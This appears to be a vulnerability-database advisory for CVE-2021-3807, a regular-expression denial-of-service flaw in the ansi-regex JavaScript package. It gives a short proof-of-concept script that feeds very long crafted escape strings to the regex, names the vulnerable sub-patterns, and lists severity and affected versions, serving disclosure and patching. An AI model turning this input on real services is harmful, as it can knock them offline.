.avif)
View all vulnerabilities
CVE-2021-3807
Inefficient Regular Expression Complexity in chalk/ansi-regex
Description
ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.
**Proof of Concept**
```js
import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = "\u001B["+";".repeat(i*10000);
ansiRegex().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
```
The ReDOS is mainly due to the sub-patterns `[[\\]()#;?]*` and `(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*`
Patch Available
Fix available through Seal Security. No upgrade required, protect your application instantly.
Fix without upgradingVulnerability Details
Score
7.5
Score Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Affected Versions
ansi-regex >= 6.0.0 < 6.0.1; ansi-regex >= 5.0.0 < 5.0.1; ansi-regex >= 4.0.0 < 4.1.1; ansi-regex >= 3.0.0 < 3.0.1
Severity
High
High
High
Ecosystem
JavaScript
Publish Date
September 20, 2021
Modified Date
November 7, 2023